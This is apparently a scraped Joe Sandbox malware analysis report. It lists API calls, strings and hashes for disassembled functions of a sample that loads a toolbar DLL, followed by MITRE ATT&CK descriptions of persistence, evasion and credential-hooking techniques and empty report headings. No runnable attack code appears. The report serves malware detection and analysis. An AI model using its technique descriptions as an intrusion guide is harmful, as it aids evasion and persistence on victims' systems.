Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: 12xy9.exePID: 5604, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1047
Total number of Limit Nodes:	29

Executed Functions

Function 008A1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 008A1006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 008A1013
GetLastError.KERNEL32 ref: 008A101F
GetCommandLineW.KERNEL32(?), ref: 008A1040
CommandLineToArgvW.SHELL32(00000000), ref: 008A1047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 008A1061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 008A1073
LoadLibraryW.KERNELBASE(?), ref: 008A1085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 008A1097
FreeLibrary.KERNELBASE(00000000), ref: 008A10A4
CloseHandle.KERNELBASE(00000000), ref: 008A10AB
CoUninitialize.COMBASE ref: 008A10B1
LocalFree.KERNEL32(00000000), ref: 008A10BC

Strings

Global\IEToolbarUninstaller, xrefs: 008A100C
tbcore3U.dll, xrefs: 008A106E, 008A1079
MyUnregisterServer, xrefs: 008A1091
tbcore3.dll, xrefs: 008A105C, 008A1067

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: cc7ec083d07cfdc6e2190dc5f67e63736de2119bea6b571ce5f35a608511027a
Instruction ID: e764b54505b2dd84d20fa8352da21949c948910aa1e60067a7b8577e770e28ae
Opcode Fuzzy Hash: cc7ec083d07cfdc6e2190dc5f67e63736de2119bea6b571ce5f35a608511027a
Instruction Fuzzy Hash: B411B132609A55EBBB20ABA0AC0CA9F37ACFA47751B000525F596D2D50DF798845C7B2

Function 008A1465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 008A146D

Part of subcall function 008A143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,008A1472,?,?,008A54EE,000000FF,0000001E,?,008A36FC,?,00000001,?,?,008A2A2A,00000018), ref: 008A1444
Part of subcall function 008A143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A1454

ExitProcess.KERNEL32 ref: 008A1476

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: b392cdc4923b19630b84515653b4835aa44cdce610722f1c387b65924ca620d2
Instruction ID: f7079e9f88bfa76b3ffff90a746854911120093c79c6ec9aadf85c8e1241d2b5
Opcode Fuzzy Hash: b392cdc4923b19630b84515653b4835aa44cdce610722f1c387b65924ca620d2
Instruction Fuzzy Hash: 5BB09B31000108FBEF052F15DC0D84D3F16FB41350B54C010F40845431DF719D5195D5

Function 008A261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 008A2630

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fcfc13cd6c39f06c453191e74657bc23bb096aca16e61febac47f5532c7c2e26
Instruction ID: 1d31b03a94be04a428f3f8279d77f158785f0c39fbc2b2deef4aab0393562c15
Opcode Fuzzy Hash: fcfc13cd6c39f06c453191e74657bc23bb096aca16e61febac47f5532c7c2e26
Instruction Fuzzy Hash: 5DD05E325947449EFB105F756C087223BDCE385395F104475B90DC6951E670C5908A04

Function 008A1681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 008A168D

Part of subcall function 008A1555: __lock.LIBCMT ref: 008A1563
Part of subcall function 008A1555: __decode_pointer.LIBCMT ref: 008A159A
Part of subcall function 008A1555: __decode_pointer.LIBCMT ref: 008A15AF
Part of subcall function 008A1555: __decode_pointer.LIBCMT ref: 008A15D9
Part of subcall function 008A1555: __decode_pointer.LIBCMT ref: 008A15EF
Part of subcall function 008A1555: __decode_pointer.LIBCMT ref: 008A15FC
Part of subcall function 008A1555: __initterm.LIBCMT ref: 008A162B
Part of subcall function 008A1555: __initterm.LIBCMT ref: 008A163B

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 744fb55a1a841e9f24c203f5d4df8bc5938a065d6995fb3e9fc7dc9b8b8c463c
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 18B0923298020833EB20258AAC07F063A0997C1BA0F250020FA0C195E1A9A3A961808A

Non-executed Functions

Function 008A10CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 008A1346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008A135B
UnhandledExceptionFilter.KERNEL32(008A816C), ref: 008A1366
GetCurrentProcess.KERNEL32(C0000409), ref: 008A1382
TerminateProcess.KERNEL32(00000000), ref: 008A1389

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: e6405fbd3b571d54f5e4eaad4b3f8be5229c49bbae6f67b09a9113d9f50090be
Instruction ID: ff749ee27f57a75d8f026df45d6280d230c496209a9a77508081210823d173bb
Opcode Fuzzy Hash: e6405fbd3b571d54f5e4eaad4b3f8be5229c49bbae6f67b09a9113d9f50090be
Instruction Fuzzy Hash: 5C21FFB8801604DFF799DF29ED886143BB4FB0A312F00501AE58887E60EB795984CF56

Function 008A21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,008A9458,0000000C,008A2320,00000000,00000000,?,008A174F,00000003,?,?,?,?,?,?,008A10F6), ref: 008A21F7
__crt_waiting_on_module_handle.LIBCMT ref: 008A2202

Part of subcall function 008A13E1: Sleep.KERNEL32(000003E8,00000000,?,008A2148,KERNEL32.DLL,?,008A2194,?,008A174F,00000003), ref: 008A13ED
Part of subcall function 008A13E1: GetModuleHandleW.KERNEL32(?,?,008A2148,KERNEL32.DLL,?,008A2194,?,008A174F,00000003,?,?,?,?,?,?,008A10F6), ref: 008A13F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 008A222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 008A223B
__lock.LIBCMT ref: 008A225D
InterlockedIncrement.KERNEL32(008AA4D8), ref: 008A226A
__lock.LIBCMT ref: 008A227E
___addlocaleref.LIBCMT ref: 008A229C

Strings

EncodePointer, xrefs: 008A221F
DecodePointer, xrefs: 008A2233
KERNEL32.DLL, xrefs: 008A21F1, 008A21F6, 008A2201

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: d83e05864aa8e49b0b39ab3d54aacd7816f694372e14f928c316b8f313ff5676
Instruction ID: 814a28abd4fed0a327c2043a2248ebc7cb285b6bf5fea5c9d464405b94596390
Opcode Fuzzy Hash: d83e05864aa8e49b0b39ab3d54aacd7816f694372e14f928c316b8f313ff5676
Instruction Fuzzy Hash: 41118C71941B01DEF730AF7D9845B5ABBE0FF16310F204559E4A9D3EA0CB78AA44CB26

Function 008A40A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 008A40AC

Part of subcall function 008A2345: __getptd_noexit.LIBCMT ref: 008A2348
Part of subcall function 008A2345: __amsg_exit.LIBCMT ref: 008A2355

__amsg_exit.LIBCMT ref: 008A40CC
__lock.LIBCMT ref: 008A40DC
InterlockedDecrement.KERNEL32(?), ref: 008A40F9
InterlockedIncrement.KERNEL32(01722AE0), ref: 008A4124

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: a8d3b8c13f1b6b2b3be1bad2b12267938fa2aa1133f856151bbaf1bef16f260f
Instruction ID: f53cb58df35b7597a8f8b5b77e2ed2e5b6598f8c041c3cdf224ce1754d5a7551
Opcode Fuzzy Hash: a8d3b8c13f1b6b2b3be1bad2b12267938fa2aa1133f856151bbaf1bef16f260f
Instruction Fuzzy Hash: 8601ED32902A219BFFA5AF2C880635D7760FB43710F044008E900E3E91CBB8A981DB96

Function 008A35EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 008A360C

Part of subcall function 008A2AA0: __mtinitlocknum.LIBCMT ref: 008A2AB6
Part of subcall function 008A2AA0: __amsg_exit.LIBCMT ref: 008A2AC2
Part of subcall function 008A2AA0: EnterCriticalSection.KERNEL32(?,?,?,008A5600,00000004,008A9628,0000000C,008A3746,?,?,00000000,00000000,00000000,?,008A22F7,00000001), ref: 008A2ACA

___sbh_find_block.LIBCMT ref: 008A3617
___sbh_free_block.LIBCMT ref: 008A3626
HeapFree.KERNEL32(00000000,?,008A9568,0000000C,008A2A81,00000000,008A94C8,0000000C,008A2ABB,?,?,?,008A5600,00000004,008A9628,0000000C), ref: 008A3656
GetLastError.KERNEL32(?,008A5600,00000004,008A9628,0000000C,008A3746,?,?,00000000,00000000,00000000,?,008A22F7,00000001,00000214), ref: 008A3667

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b0dcdb398e9cf555de65e4f59053ebdf13cf8cfebf2f21d78cfffef711df152c
Instruction ID: 2b30ddd340558987b270f167de3168ff991562c3be812b905e783d4b9d419da9
Opcode Fuzzy Hash: b0dcdb398e9cf555de65e4f59053ebdf13cf8cfebf2f21d78cfffef711df152c
Instruction Fuzzy Hash: E9016D71D05305BAFB306BB99C06B5E7A64FF23760F604049F440E6E92DB788A40EA5A

Function 008A3E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 008A3E10

Part of subcall function 008A2345: __getptd_noexit.LIBCMT ref: 008A2348
Part of subcall function 008A2345: __amsg_exit.LIBCMT ref: 008A2355

__getptd.LIBCMT ref: 008A3E27
__amsg_exit.LIBCMT ref: 008A3E35
__lock.LIBCMT ref: 008A3E45

Memory Dump Source

Source File: 00000029.00000002.2840294584.00000000008A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000029.00000002.2840274270.00000000008A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840333246.00000000008AA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2840356563.00000000008AC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8a0000_12xy9.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: badbdab47b4c8352965217e10fdc80b151cb383b7699fccb72ec191717b9fff0
Instruction ID: 449e4a7e9cf06fdd0a808c4c57487d3bc41d38af35e0372d112c992e759f2524
Opcode Fuzzy Hash: badbdab47b4c8352965217e10fdc80b151cb383b7699fccb72ec191717b9fff0
Instruction Fuzzy Hash: 83F06732A017108BFB70ABBC840674D72A0FF5BB20F104189F451EBEA2CB74AA11CB53

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1387457-38765948.15.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

